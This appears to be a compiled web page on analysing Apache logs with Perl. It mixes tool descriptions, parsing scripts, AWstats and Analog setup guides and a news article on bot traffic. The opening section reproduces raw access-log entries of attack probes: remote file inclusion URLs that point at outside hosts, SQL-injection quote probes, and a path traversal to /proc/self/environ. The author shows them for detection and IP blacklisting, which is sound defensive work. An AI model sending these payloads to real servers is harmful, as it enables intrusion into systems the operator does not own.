/Solaris/load_lang.php?_SERWEB[serwebdir]=http://www.progene.info/English/bodo.txt??? HTTP/1.1" 302 826 "-" "libwww-perl/5.79" 222.122.13.12 - - [16/Aug/2010:11:03:39 -0600] "GET /400.shtml?_SERWEB%5bserwebdir%5d=http://www.progene.info/English/bodo.txt%3f%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.79" 222.122.13.12 - - [16/Aug/2010:11:03:39 -0600] "GET /400.shtml?_SERWEB%5bserwebdir%5d=http://www.progene.info/English/bodo.txt%3f%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.79" 222.122.13.12 - - [16/Aug/2010:11:03:39 -0600] "GET /400.shtml?_SERWEB%5bserwebdir%5d=http://www.progene.info/English/bodo.txt%3f%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.79" 84.242.142.98 - - [16/Aug/2010:11:42:34 -0600] "GET /Solaris/Security/solaris_root_password_recovery.shtml////?_SERVER[DOCUMENT_ROOT]=http://genol.fileave.com/MC22.txt? HTTP/1.1" 302 808 "-" "libwww-perl/5.65" 84.242.142.98 - - [16/Aug/2010:11:42:34 -0600] "GET /400.shtml?_SERVER%5bDOCUMENT_ROOT%5d=http://genol.fileave.com/MC22.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.65" 84.242.142.98 - - [16/Aug/2010:11:42:35 -0600] "GET ////?_SERVER[DOCUMENT_ROOT]=http://genol.fileave.com/MC22.txt? HTTP/1.1" 500 747 "-" "libwww-perl/5.65" 84.242.142.98 - - [16/Aug/2010:11:42:35 -0600] "GET /Solaris/Security////?_SERVER[DOCUMENT_ROOT]=http://genol.fileave.com/MC22.txt? HTTP/1.1" 500 767 "-" "libwww-perl/5.65" 84.242.142.98 - - [16/Aug/2010:11:42:36 -0600] "GET /Solaris/Security/solaris_root_password_recovery.shtml////?_SERVER[DOCUMENT_ROOT]=http://genol.fileave.com/MC22.txt? HTTP/1.1" 302 808 "-" "libwww-perl/5.65" 84.242.142.98 - - [16/Aug/2010:11:42:36 -0600] "GET /400.shtml?_SERVER%5bDOCUMENT_ROOT%5d=http://genol.fileave.com/MC22.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.65" 84.242.142.98 - - [16/Aug/2010:11:42:36 -0600] "GET ////?_SERVER[DOCUMENT_ROOT]=http://genol.fileave.com/MC22.txt? HTTP/1.1" 500 747 "-" "libwww-perl/5.65" 84.242.142.98 - - [16/Aug/2010:11:42:37 -0600] "GET /Solaris/Security////?_SERVER[DOCUMENT_ROOT]=http://genol.fileave.com/MC22.txt? HTTP/1.1" 500 767 "-" "libwww-perl/5.65" 203.147.62.92 - - [16/Aug/2010:12:21:15 -0600] "GET /Scripting/php.shtml/index.php?zone=shop/product.asp?CategoryID=' HTTP/1.1" 302 754 "-" "libwww-perl/5.805" 203.147.62.92 - - [16/Aug/2010:12:21:16 -0600] "GET /Scripting/php.shtml/index.php?zone=shop/product.asp?CategoryID=' HTTP/1.1" 302 754 "-" "libwww-perl/5.805" 203.147.62.92 - - [16/Aug/2010:12:21:16 -0600] "GET /400.shtml?zone=shop/product.asp%3fCategoryID=' HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 203.147.62.92 - - [16/Aug/2010:12:21:16 -0600] "GET /400.shtml?zone=shop/product.asp%3fCategoryID=' HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 203.147.62.92 - - [16/Aug/2010:12:21:16 -0600] "GET /index.php?zone=shop/product.asp?CategoryID=' HTTP/1.1" 302 754 "-" "libwww-perl/5.805" 203.147.62.92 - - [16/Aug/2010:12:21:17 -0600] "GET /index.php?zone=shop/product.asp?CategoryID=' HTTP/1.1" 302 754 "-" "libwww-perl/5.805" 203.147.62.92 - - [16/Aug/2010:12:21:17 -0600] "GET /400.shtml?zone=shop/product.asp%3fCategoryID=' HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 203.147.62.92 - - [16/Aug/2010:12:21:17 -0600] "GET /400.shtml?zone=shop/product.asp%3fCategoryID=' HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 203.147.62.92 - - [16/Aug/2010:12:21:17 -0600] "GET /Scripting/index.php?zone=shop/product.asp?CategoryID=' HTTP/1.1" 302 754 "-" "libwww-perl/5.805" 203.147.62.92 - - [16/Aug/2010:12:21:18 -0600] "GET /Scripting/index.php?zone=shop/product.asp?CategoryID=' HTTP/1.1" 302 754 "-" "libwww-perl/5.805" 203.147.62.92 - - [16/Aug/2010:12:21:18 -0600] "GET /400.shtml?zone=shop/product.asp%3fCategoryID=' HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 203.147.62.92 - - [16/Aug/2010:12:21:18 -0600] "GET /400.shtml?zone=shop/product.asp%3fCategoryID=' HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 194.146.226.69 - - [16/Aug/2010:12:26:19 -0600] "GET /index.php?pageid=' HTTP/1.1" 302 698 "-" "libwww-perl/5.834" 194.146.226.69 - - [16/Aug/2010:12:26:19 -0600] "GET /400.shtml?pageid=' HTTP/1.1" 500 756 "-" "libwww-perl/5.834" 194.146.226.69 - - [16/Aug/2010:12:28:51 -0600] "GET /Admin/Tivoli/TEC/Event_console/index.shtml/index.php?pageid=' HTTP/1.1" 302 698 "-" "libwww-perl/5.834" 194.146.226.69 - - [16/Aug/2010:12:28:52 -0600] "GET /400.shtml?pageid=' HTTP/1.1" 500 756 "-" "libwww-perl/5.834" 194.146.226.69 - - [16/Aug/2010:12:28:52 -0600] "GET /index.php?pageid=' HTTP/1.1" 302 698 "-" "libwww-perl/5.834" 194.146.226.69 - - [16/Aug/2010:12:28:52 -0600] "GET /400.shtml?pageid=' HTTP/1.1" 500 756 "-" "libwww-perl/5.834" 194.146.226.69 - - [16/Aug/2010:12:28:53 -0600] "GET /Admin/Tivoli/TEC/Event_console/index.php?pageid=' HTTP/1.1" 302 698 "-" "libwww-perl/5.834" 194.146.226.69 - - [16/Aug/2010:12:28:53 -0600] "GET /400.shtml?pageid=' HTTP/1.1" 500 756 "-" "libwww-perl/5.834" 77.243.239.121 - - [16/Aug/2010:12:41:05 -0600] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.805" 77.243.239.121 - - [16/Aug/2010:12:41:06 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 77.243.239.121 - - [16/Aug/2010:12:41:36 -0600] "GET /Scripting/pipes.shtml//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.805" 77.243.239.121 - - [16/Aug/2010:12:41:37 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 77.243.239.121 - - [16/Aug/2010:12:41:37 -0600] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.805" 77.243.239.121 - - [16/Aug/2010:12:41:37 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 77.243.239.121 - - [16/Aug/2010:12:41:38 -0600] "GET /Scripting//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.805" 77.243.239.121 - - [16/Aug/2010:12:41:38 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 85.236.38.205 - - [16/Aug/2010:12:41:39 -0600] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.805" 85.236.38.205 - - [16/Aug/2010:12:41:39 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 77.243.239.121 - - [16/Aug/2010:12:41:48 -0600] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.805" 77.243.239.121 - - [16/Aug/2010:12:41:48 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 85.236.38.205 - - [16/Aug/2010:12:42:24 -0600] "GET /Scripting/pipes.shtml//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.805" 85.236.38.205 - - [16/Aug/2010:12:42:24 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 85.236.38.205 - - [16/Aug/2010:12:42:25 -0600] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.805" 85.236.38.205 - - [16/Aug/2010:12:42:25 -0600] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.805" 85.236.38.205 - - [16/Aug/2010:12:42:25 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 85.236.38.205 - - [16/Aug/2010:12:42:26 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 85.236.38.205 - - [16/Aug/2010:12:42:26 -0600] "GET /Scripting//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.805" 85.236.38.205 - - [16/Aug/2010:12:42:26 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 89.111.176.226 - - [16/Aug/2010:12:42:29 -0600] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.810" 89.111.176.226 - - [16/Aug/2010:12:42:29 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810" 89.111.176.226 - - [16/Aug/2010:12:42:38 -0600] "GET /Scripting/pipes.shtml//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.810" 89.111.176.226 - - [16/Aug/2010:12:42:39 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810" 89.111.176.226 - - [16/Aug/2010:12:42:39 -0600] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.810" 89.111.176.226 - - [16/Aug/2010:12:42:40 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810" 89.111.176.226 - - [16/Aug/2010:12:42:40 -0600] "GET /Scripting//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.810" 89.111.176.226 - - [16/Aug/2010:12:42:40 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810" 89.111.176.226 - - [16/Aug/2010:12:43:40 -0600] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 878 "-" "libwww-perl/5.810" 89.111.176.226 - - [16/Aug/2010:12:43:41 -0600] "GET /400.shtml?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810"
One common thing for such record is the usage of libwww-perl. Greping on string libwww brings us more complete picture. Generally those are "blind probes" used by script kiddies to detect some exploitable vulnerability.
Extracting IP addresses gives you the first draft of the "blacklist" and that top dozen can be used to block those rogue addresses from accessing your site. To get such a "dirty dozen" you can use a simple pipe which can be made into a function or shell script:
grep libwww $1 | cut -d' ' -f 1 | sort -n | uniq -c | sort -rn | head -12 > $1.dirty
Below are the results of processing of the list from above:
20 83.149.125.174 home.w-sieci.pl 18 80.67.20.21 mayermail.de 12 200.69.222.122 contactar01.gestionarnet.com 11 64.78.163.2 nickentgolf.com 11 62.193.224.166 wpc0230.amenworld.com 10 86.109.161.201 lincl239.ns1.couldix.com 9 87.230.2.113 lvps87-230-2-113.dedicated.hosteurope.de 9 85.214.55.73 mind-creations.net 7 193.192.249.157 6 87.118.96.254 ns.km22206-02.keymachine.de 6 72.55.153.108 ip-72-55-153-108.static.privatedns.com 6 66.147.239.104 host.1sbs.com 6 216.246.52.59 server.dynasoft.com.ph 6 213.195.77.225 225.77.195.213.ibercom.com 5 217.115.197.51 node11.cluster.nxs.nl
There are a lot of free http log file analysis written in Perl out there that haven't been updated since the mid 90's. However AWstats is one of the few well-written scripts that is both free, and up to date.
\There are a lot of free http log file analysis tools out there that haven't been updated since the mid 90's, awstats however is both free, and up to date. It looks a bit like web trends (though I haven't used web trends in several years). Here's an online demo. awstats can be used on several web servers including IIS, and Apache. You can either have generate static html files, or run with a perl script in the cgi-bin.
Here's a quick rundown of setting it up on unix/apache
Each virtual web site you want to track stats for should have a file /etc/awstats.sitename.conf the directives for the configuration file can be found here: http://awstats.sourceforge.net/docs/awstats_config.html they also provide a default conf file in cgi-bin/awstats.model.conf you can use this as a base.
Make sure your log files are using NCSA combined format, this is usually done in apache by saying CustomLog /logs/access.log combined you can use other formats but you have to customize the conf file.
You will probably want to edit the LogFile directive to point to where your logfile is stored, SiteDomain this is the main domain for the site, HostAliases lets you put in other domains for the site, and the DirData directive lets you specify where the awstats databases will be stored (each site will have its own file in the directory).
Once that is setup you will want to update the database this is done from the command line by running
perl awstats.pl -config=sitename -updateNow copy everything in the wwwroot folder to a web root, and visit http://sitename.com/cgi-bin/awstats.pl if you want to view other domains use /cgi-bin/awstats.pl?config=othersitename
Where sitename would be the name of your config file awstats.sitename.conf
If you want to generate static html files run the awstats_buildstaticpages.pl script found in the tools folder. You have to give it the path to the awstats.pl perl script, and a directory to put the static html files in.
perl awstats_buildstaticpages.pl -config=sitename -awstatsprog=/web/cgi-bin/awstats.pl -dir=/web/stats/sitename/More setup info can be found here: http://awstats.sourceforge.net/docs/index.html
If one is looking for Squid logs analyzer in Perl, Calamaris is one variant to try. See also Proxy log analysers
There is plenty of simple Perl scripts for log processing on the Web nowadays. See for example Unix Log Analysis
Name | Platform | Cost | Available from | Notes |
---|---|---|---|---|
3Dstats | UNIX | free | Netstore | |
Analog | Mac, Windows Unix | free | http://www.analog.cx/ Mac version also available from summary.net | |
BrowserCounter | UNIX | free | Benjamin "Snowhare" Franz | |
eXTReMe Tracking | Any (online service) | Free | eXTReMe Tracking | Unique visitors, referrers, browser, geographical location... No traffic limitation |
FTPWebLog | UNIX | free | Benjamin "Snowhare" Franz | |
iisstat | UNIX | free | Lotus Development Corporation | |
pwebstat | Unix (requires perl5 + fly) | free | Martin Gleeson | |
RefStats | UNIX | free | Benjamin "Snowhare" Franz | |
Relax | Unix, Windows | free (GPL) | ktmatu | Perl 5 script for referrer and search engine keyword analysis. |
Webalizer | Unix | free (GPL) | Bradford L Barrett | Supports common logfile format & variations of combined logfile format, partial logs & multiple languages. |
wwwstat | UNIX | free | Roy Fielding | |
W3Perl | Unix, Windows | free (GPL) | Laurent Domisse |
|
Switchboard | ||||
Latest | |||||
Past week | |||||
Past month |
Dec 18 2014 | wa8dzp
Bots Now Outnumber Humans on the Web
By ROBERT MCMILLAN
Dec 18 2014
<http://www.wired.com/2014/12/bots-now-outnumber-humans-web/>Diogo Mónica once wrote a short computer script that gave him a secret weapon in the war for San Francisco dinner reservations.
This was early 2013. The script would periodically scan the popular online reservation service, OpenTable, and drop him an email anytime something interesting opened up - a choice Friday night spot at the House of Prime Rib, for example. But soon, Mónica noticed that he wasn't getting the tables that had once been available.
By the time he'd check the reservation site, his previously open reservation would be booked. And this was happening crazy fast. Like in a matter of seconds. "It's impossible for a human to do the three forms that are required to do this in under three seconds," he told WIRED last year.
Mónica could draw only one conclusion: He'd been drawn into a bot war.
Everyone knows the story of how the world wide web made the internet accessible for everyone, but a lesser known story of the internet's evolution is how automated code-aka bots-came to quietly take it over. Today, bots account for 56 percent of all of website visits, says Marc Gaffan, CEO of Incapsula, a company that sells online security services. Incapsula recently an an analysis of 20,000 websites to get a snapshot of part of the web, and on smaller websites, it found that bot traffic can run as high as 80 percent.
People use scripts to buy gear on eBay and, like Mónica, to snag the best reservations. Last month, the band, Foo Fighters sold tickets for their upcoming tour at box offices only, an attempt to strike back against the bots used by online scalpers. "You should expect to see it on ticket sites, travel sites, dating sites," Gaffan says. What's more, a company like Google uses bots to index the entire web, and companies such as IFTTT and Slack give us ways use the web to use bots for good, personalizing our internet and managing the daily informational deluge.
But, increasingly, a slice of these online bots are malicious-used to knock websites offline, flood comment sections with spam, or scrape sites and reuse their content without authorization. Gaffan says that about 20 percent of the Web's traffic comes from these bots. That's up 10 percent from last year.
Often, they're running on hacked computers. And lately they've become more sophisticated. They are better at impersonating Google, or at running in real browsers on hacked computers. And they've made big leaps in breaking human-detecting captcha puzzles, Gaffan says.
"Essentially there's been this evolution of bots, where we've seen it become easier and more prevalent over the past couple of years," says Rami Essaid, CEO of Distil Networks, a company that sells bot-blocking software.
But despite the rise of these bad bots, there is some good news for the human race. The total percentage of bot-related web traffic is actually down this year from what it was in 2013. Back then it accounted for 60 percent of the traffic, 4 percent more than today.
Now that the hostname lookups are taken care of, it's time to write the log-analysis script. Example 8-2 shows the first version of that script.
Example 8-2: log_report.plx, a web log-analysis script (first version)
#!/usr/bin/perl -w
# log_report.plx
# report on web visitors
use strict;
while (<>) {
my ($host, $ident_user, $auth_user, $date, $time,
$time_zone, $method, $url, $protocol, $status, $bytes) =
/^(\S+) (\S+) (\S+) \[([^:]+):(\d+:\d+:\d+) ([^\]]+)\] "(\S+) (.+?)
(\S+)" (\S+) (\S+)$/;
print join "\n", $host, $ident_user, $auth_user, $date, $time,
$time_zone, $method, $url, $protocol, $status,
$bytes, "\n";
}
This first version of the script is simple. All it does is read in lines via the
<>
operator, parse those lines into their component pieces, and then print out the parsed elements for debugging purposes. The line that does the printing out is interesting, in that it uses Perl'sjoin
function, which you haven't seen before. Thejoin
function is the polar opposite, so to speak, of thesplit
function: it lets you specify a string (in its first argument) that will be used to join the list comprising the rest of its arguments into a scalar. In other words, the Perl expressionjoin '-', 'a', 'b', 'c'
would return the stringa-b-c
. And in this case, using\n
to join the various elements parsed by our script lets us print out a newline-separated list of those parsed items.
You could theoretically have as many text files as you want as command-line arguments but so far I haven't gotten that part to work, I just have:./logprocess.pl monster.log #monster.log is the file that contains entries
then in the code, assume all variables not specified have been declared as scalars
my $x = 0; my @hashstuff; my $importPage = $ARGV[0]; my @pageFile = `$importPage`; foreach my $line (@pageFile) { $ipaddy, $date, $time, $method, $url, $httpvers, $statuscode, $bytes, $referer, $useragent =~ m#(\d+.\d+.\d+.\d+) \S+ \S+ [(\d+/\S+/\d+):(\d+:\d+:\d+) \S+] "(\S+) (\S+) (\S+)" (\d+) (\d+) "(\S+)" "(\S+ \S+ \S+ \S+ \S+)"# %info = ('ipaddy' => $ipaddy, 'date' => $date, 'time' => $time, 'method' => $method, 'url' => $url, 'httpvers' => $httpvers, 'statuscode' => $statuscode, 'bytes' => $bytes, 'referer' => $referer, 'useragent' => $useragent); $hashstuff[$x] = %info; $x++;
}
Listing 21.1-21LST01.PL - Read the Access Log and Parse Each Entry #!/usr/bin/perl -w $LOGFILE = "access.log"; open(LOGFILE) or die("Could not open log file."); foreach $line () { ($site, $logName, $fullName, $date, $gmt, $req, $file, $proto, $status, $length) = split(' ',$line); $time = substr($date, 13); $date = substr($date, 1, 11); $req = substr($req, 1); chop($gmt); chop($proto); # do line-by-line processing. } close(LOGFILE);
ktmatu's Log tools - Three of these: (from their page)
Relax - WWW logfile referring URL and search engine keyword analysis tool. This free Perl script recognizes many search engines and organizes popular keywords used to get to your site.
Lrdns - Log Reverse Domain Name System converts numeric IP addresses in accesss log files into textual domain names. Written in Perl.
Ffcat - Prints only the new entries in a log file. Fast forwards to the position where the last run ended, and then copies only the new lines of that file to the standard output. Written in Perl.
The following is a webalizer written in perl to analyze apache log files.Currently, four options can (should) be given when invoking the script: -n <number> prints the top <number> accessed documents,
#!/usr/bin/perl -w use strict; use Getopt::Std; open (LOG, "/var/log/httpd/adp-gmbh/xlf_log"); my $options = {}; # n how many urls? # r print referers? # f print from (which hosts)? getopts("n:rfht:", $options); my $methods = {}; my $urls = {}; if ($options->{h}) { print "options:\n"; print " -n <n> print the top n visited urls\n"; print " -r show referrers\n"; print " -f show who has visited (f = from)\n"; print " -t <n> show top <n> referrers and froms only\n"; print "\n"; exit; } my $ignoreHosts = { "xxx.yy.zzz.aaa" => {}, }; my $countGiven=0; $countGiven = 1 if defined $options->{n}; while (my $line=<LOG>) { my ($host,$date,$url_with_method,$status,$size,$referrer,$agent) = $line =~ m/^(\S+) - - \[(\S+ [\-|\+]\d{4})\] "(\S+ \S+ [^"]+)" (\d{3}) (\d+|-) "(.*?)" "([^"]+)"$/; next unless $date =~ m#\d{1,2}/Feb/2002#; print $line unless $url_with_method; my ($method, $url, $http) = split /\s+/, $url_with_method; $url =~ s/\?(.*)//; $referrer=~ s/\?(.*)//; push @{$methods->{$method}}, $url; $urls->{$url} -> {host } -> {$host} ++; $urls->{$url} -> {count } ++; $urls->{$url} -> {referrer} -> {$referrer} ++; } foreach my $m (keys %{$methods}) { print "$m : " . @{$methods->{$m}} . "\n"; } my $nofUrls = 0; foreach my $url (sort {$urls->{$b}->{count} <=> $urls->{$a}->{count} } keys %{$urls}) { printf "%5d %s\n\n", $urls->{$url}->{count}, $url; my @linesOut; if ($options->{f}) { my $currentLine=0; printf " %6s%-35s"," ","hosts"; foreach my $host (sort {$urls->{$url}->{host}->{$b} <=> $urls->{$url}->{host}->{$a} } keys %{$urls->{$url}->{host}}) { last if $currentLine > $options->{t}; $linesOut[$currentLine] .= sprintf " %5d %-35.35s" ,$urls->{$url}->{host}->{$host}, $host; $currentLine++; } } if ($options->{r}) { my $currentLine=0; printf " %6s%-55s"," ","referrers"; foreach my $referrer (sort {$urls->{$url}->{referrer}->{$b} <=> $urls->{$url}->{referrer}->{$a} } keys %{$urls->{$url}->{referrer}}) { last if $currentLine > $options->{t}; $linesOut[$currentLine] .= sprintf " %5d %-55.55s" ,$urls->{$url}->{referrer}->{$referrer}, $referrer; $currentLine++; } } print "\n"; foreach my $line (@linesOut) { print "$line\n"; } print "\n"; if ($countGiven) { last if $nofUrls >= $options->{n}; } $nofUrls++; }
What's so special about this program?When we started out writing this program, people asked us "why write yet another statistics program for your weblog when there are dozens of them for free on the web including all possible reports and analyses?"
True, but we don't need a program that generates 12-page reports about everything that can possibly be found through the logs. We need to monitor daily for our site, a handful of important aspects/trends of our traffic. We don't want them buried in pages and pages of other, mostly useless, information. We wanted a program that would show what we thought was important. So we made it, and we decided to also offer it for free here.Perhaps you're interested to watch some other figures than this program doesn't. There are so many free web log analysis programs that we're sure you'll find a suitable one for your site. Otherwise, the trends that we watch with this program, are pretty much the most essential and informative ones, and you should definetly have a program to investigate them.
Features
- Monthly/Daily reports - helps you spot trends both short and long term. Watch day-by-day statistics to see how your site's traffic, sources of visitors and search engine success fluxuate throughout the week. Have a look at the monthly summary to see how you're growing by the day. Look back on your site's history on the global all-time report.
- Traffic breakdown per document - find out how much traffic each single document on your site receives.
- Referer log analysis - see all pages that referred visitors to your site, ranked by the amount of traffic they generated.
- Gateway analysis - Which pages are the first that visitors see in your site? See where they enter from, to get an idea of what subjects bring you the most traffic, and what your visitors are looking for.
- Multiple Logs - Even if your site is being delivered by mutliple web servers (as is usually the case with mod_perl enabled sites) the program can keep track of multiple logs and merge the data appropriately.
- Fast - Munches logs at speeds close to 3000 lines per second on a PentiumII-class machine..
Requirements
This program works with the plain or combined logs that the Apache web server generates. You might get IIS to generate a compatible log, but I won't get into that. Other than that, all you need is perl (and reliable webhosting) to run it.Download
Click here to download dailystats-3.0.tgz.Installation/Usage
There is a README file in the archive you just downloaded, explaining how to install it and run it.Licence
Perlfect Daily Stats is freely distributed under the GNU Public Licence.
W3Perl 3.13 is a Web logfile analyzer. But it can also read FTP/Squid or mail logfiles. It allows most statistical data to be ouput with graphical and textual information. An administration interface is available to manage the package.(more)
HowtoForge
Now that YUM has its additional repository we are ready to install. From the commandline type:
yum install awstats
Modify AWStats Apache Configuration:
Edit /etc/httpd/conf.d/awstats.conf (Note: When putting your conf file in the /etc/httpd/conf.d/ folder it's automatically loaded as part of the Apache configuration. There is no need to add it again into httpd.conf. This setup is usually for one of two reasons; A cleaner approach and separating of different applications in their own configuration files, or you are in a hosted environment that does not allow for direct editing of httpd.conf):
Alias /awstats/icon/ /var/www/awstats/icon/ ScriptAlias /awstats/ /var/www/awstats/ <Directory /var/www/awstats/> DirectoryIndex awstats.pl Options ExecCGI order deny,allow allow from all </Directory> Alias /awstatsclasses "/var/www/awstats/lib/" Alias /awstats-icon/ "/var/www/awstats/icon/" Alias /awstatscss "/var/www/awstats/examples/css"Note: the mod_cgi module of Apache must be pre-loaded into Apache otherwise Apache will not try to view the file, it will try to execute it. This can be done in two ways, either enable for the entire web server, or utilizing VirtualHosts, enable for AWStats.
Edit the following lines in the default awstats configuration file /etc/awstats/awstats.localhost.localdomain.conf:
SiteDomain="<server name>.<domain>" HostAliases="<any aliases for the server>"Rename config file:
mv /etc/awstats/awstats.localhost.localdomain.conf /etc/awstats/awstats.<server name>.<domain>.conf
Update Statistics (Note: By default, statistics will be updated every hour.):
/usr/bin/awstats_updateall.pl now -confdir="/etc" -awstatsprog="/var/www/awstats/awstats.pl"
Start Apache:
/etc/init.d/httpd start
To automate startup of Apache on boot up, type
chkconfig --add httpd
Verify Install
Go to http://<server name>.<domain>/awstats/awstats.pl?config=<server name>.<domain>
Securing AWStats
Setting File System Permissions
The webserver needs only read-access to your files in order for you to be able to access AWStats from the browser. Limiting your own permissions will keep you from accidentally messing with files. Just remember that with this setup you will have to run perl to execute scripts rather than executing the scripts themselves.
$ find ./awstats -type d -exec chmod 701 '{}' \;
$ find ./awstats -not -type d -exec chmod 404 '{}' \;Apache doesn't need direct access to AWStats configuration files therefore we can secure them tightly and not affect the relationship between them. To ensure that your .htaccess files are not readable via browser:
chmod 400 /etc/awstats/*.conf
Protecting The AWStats Directory With And Adding .htaccess
To secure the Awstats folder(s), is a measured process. Ensuring ownership of the awstats folder is owned by the user that needs access to it, creating an htpasswd.users file and adding the corresponding .htaccess file to authenticate against it. Let's first secure the awstats folder by typing the below from the command-line:
find ./awstats -type d -exec chmod 701 '{}' \;
find ./awstats -not -type d -exec chmod 404 '{}' \;Now that our folders have been secured, we'll need to create the .htpasswd.users file. Go to the /etc/awstats folder and execute the following command:
htpasswd -c /etc/awstats/htpasswd.users user
(Select whatever username you'd like.)
It'll ask you to add a password for the user you've selected, add it and re-type it for confirmation and then save. The final step is to create an .htaccess file pointing to the .htpasswd file for authentication. Go to /var/www/awstats/ and create a new file called .htaccess using your favorite editor, typically nano or vi tend to be the more popular ones. In this example we'll use vi. From the command line type
vi .htaccess
An alternate method of creating an .htaccess file is using the Htaccess Password Generator. Add the following content to your newly created .htaccess file:
AuthName "STOP - Do not continue unless you are authorized to view this site! - Server Access" AuthType Basic AuthUserFile /etc/awstats/htpasswd.users Require valid-user htpasswd -c /etc/awstat/htpasswd.users awstats_onlineOnce done, secure the .htaccess file by typing:
chmod 404 awstats/.htaccess
open.itworld.com
Analog is a free web traffic analysis tool that prepares reports on activity on your web sites, including graphs that summarize hourly, daily, file size file type, visiting site, return codes and numerous other statistics that illustrate how your web sites are being used. I recently compiled and deployed Analog on a couple of Solaris 9 servers. Today's column is a how-to on building Analog and a quick introduction to how it works.
To compile Apache on a Solaris system, you should first grab a copy of the source code. I went to http://www.analog.cx/download.html and downloaded analog-6.0.tar.gz. This command should work on the command line if you have wget installed:
wget http://www.analog.cx/analog-6.0.tar.gz
I then gunzipped and extracted the contents of the downloaded file and attempted to compile the application: $ gunzip analog-6.0.tar.gz $ tar xf analog-6.0.tar $ cd analog-6.0 $ make
My attempt to compile Analog ran into some problems -- notably undefined symbols.
